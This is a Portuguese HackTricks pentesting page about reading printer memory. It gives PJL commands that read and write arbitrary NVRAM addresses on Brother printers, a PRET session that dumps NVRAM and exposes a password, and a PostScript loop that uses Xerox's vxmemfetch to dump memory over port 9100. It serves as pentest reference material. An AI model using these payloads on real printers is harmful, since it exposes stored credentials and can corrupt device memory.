hacktricks/network-services-pentesting/pentesting-printers/memory-access.md
2023-06-06 18:56:34 +00:00

4.8 KiB

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

Você pode tentar despejar o NVRAM e extrair informações confidenciais (como senhas) de lá.

No PJL (Brother), você pode acessar endereços NVRAM arbitrários usando PJL, conforme mostrado abaixo:

@PJL RNVRAM ADDRESS = X              # read byte at location X
@PJL WNVRAM ADDRESS = X DATA = Y     # write byte Y to location X

Você pode testar este ataque usando o PRET:

./pret.py -q printer pjl
Connection to printer established

Welcome to the pret shell. Type help or ? to list commands.
printer:/> nvram dump
Writing copy to nvram/printer
................................................................................
................................................................................
............................................MyS3cretPassw0rd....................
................................................................................

Certos modelos de impressoras Xerox possuem um operador proprietário PostScript chamado vxmemfetch, que permite que um invasor leia endereços de memória arbitrários. Usando um loop PostScript, esse recurso pode ser facilmente usado para despejar toda a memória, como mostrado abaixo (o PRET não possui esse ataque, portanto, você precisará enviar essa carga útil para a porta 9100 em uma conexão nc):

/counter 0 def 50000 {
  /counter counter 1 add def
  currentdict /RRCustomProcs /ProcSet findresource begin
  begin counter 1 false vxmemfetch end end == counter
} repeat

Mais informações aqui: http://hacking-printers.net/wiki/index.php/Memory_access

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥